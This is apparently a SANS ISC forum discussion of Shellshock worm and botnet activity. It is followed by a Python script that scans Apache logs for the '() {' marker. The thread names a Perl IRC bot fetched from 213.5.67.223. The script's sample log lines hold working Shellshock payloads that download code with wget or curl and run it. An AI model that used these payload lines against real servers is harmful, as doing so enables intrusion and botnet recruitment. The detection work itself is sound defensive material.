SANS ISC InfoSec Forums

At the Storm Center, we are strict and judicious about moving the InfoCon status. We felt, after dialog, that Yellow is warranted in this case, as we are seeing signs of worm/botnet activity. This, combined with so many systems being impacted [worm], with no signs of letting up [met].

We will monitor this closely and relax InfoCon when the situation seems to be more stable.

I also saw attempts to wget/curl and execute http://213.5.67.223/ji (another Perl script). It's kind of a mess, but it looks like it would connect to #gnu on ircd.w3h.co.uk:6667 to listen for a variety of script kiddie commands, your basic botnet zombie. We'll probably see a lot of these now. It also looks like it tries to spread itself to randomly-generated domains.

Do you know if Apache is working on this from their end, like sanitizing their environment variables? Knowing that passing anything with "() {" to an environment variable creates a nasty vulnerability, it seems Apache has the power to stop these pretty trivially. (And that goes for any other program that sets environment variables from incoming data.)
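As an added example (not code from this thread or from the ISC), here is a small Python scanner for the "() {" marker discussed above, run over Apache combined-format access log lines. Apache's mod_cgi exports the request line, Referer and User-Agent into the CGI environment (HTTP_USER_AGENT, HTTP_REFERER, ...), which is how the function-definition prefix reaches bash. The script parses those three fields, flags any value starting a bash function export, extracts the command bash would run after the closing brace, and pulls out wget/curl download URLs like the http://213.5.67.223/ji fetch mentioned earlier. The sample log lines are constructed for this example; apart from 213.5.67.223, which appears on this page, the addresses are from documentation ranges.

```python
import re

# The prefix bash (pre-patch) treated as an exported function definition.
# bash tolerates whitespace between the tokens, so match loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Download commands seen in the follow-on payloads; capture the URL.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;|&\"']*?(https?://\S+)")

# One quoted field in Apache's combined log; Apache escapes embedded
# quotes as \" so the field may contain backslash-escaped characters.
FIELD = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r"^(\S+) \S+ \S+ \[([^\]]+)\] " + FIELD + r" (\d{3}) (\S+) " + FIELD + r" " + FIELD + r"$"
)

# Constructed sample lines (not real traffic). Line 1 carries the payload in
# User-Agent, line 2 in Referer, lines 3 and 4 are benign (line 4 has a
# URL-encoded "()%20{" that never reaches bash as "() {").
SAMPLE_LOG = r'''
203.0.113.10 - - [25/Sep/2014:10:14:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://213.5.67.223/ji -O /tmp/ji; perl /tmp/ji\""
198.51.100.7 - - [25/Sep/2014:10:14:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { ignored;}; /usr/bin/curl http://203.0.113.99/bot.pl | perl" "Mozilla/5.0"
192.0.2.44 - - [25/Sep/2014:10:15:21 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.45 - - [25/Sep/2014:10:15:30 +0000] "GET /search?q=f()%20{x} HTTP/1.1" 200 100 "-" "curl/7.37.0"
'''


def parse_combined(line):
    """Parse one combined-format line into the attacker-controlled fields.

    Returns None for lines that do not match the format.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, req, status, size, referer, ua = m.groups()

    def unescape(s):
        # Undo Apache's backslash escaping of quotes inside logged fields.
        return s.replace('\\"', '"')

    return {
        "ip": ip,
        "ts": ts,
        "status": status,
        "request": unescape(req),
        "referer": unescape(referer),
        "user_agent": unescape(ua),
    }


def extract_command(value):
    """Return what bash would execute after importing the bogus function.

    bash parses "() { body; }" and then keeps going with whatever follows
    the closing brace, which is the injected command.
    """
    m = SHELLSHOCK_RE.search(value)
    if not m:
        return ""
    rest = value[m.end():]
    brace_end = rest.find("}")
    if brace_end < 0:
        return ""
    return rest[brace_end + 1:].lstrip(";").strip()


def scan_log(text):
    """Scan combined-format log text; return one hit per flagged field."""
    hits = []
    for line in text.strip().splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("request", "referer", "user_agent"):
            value = rec[field]
            if not SHELLSHOCK_RE.search(value):
                continue
            hits.append({
                "ip": rec["ip"],
                "field": field,
                "command": extract_command(value),
                "fetch_urls": FETCH_RE.findall(value),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["field"], hit["command"], hit["fetch_urls"])
```

Real traffic will also put the marker in Cookie, Host and other headers that get exported as HTTP_*; extend the field list if your LogFormat records them. The extracted fetch URLs are a convenient feed for blocking at the egress proxy and for pulling the bot sample for analysis.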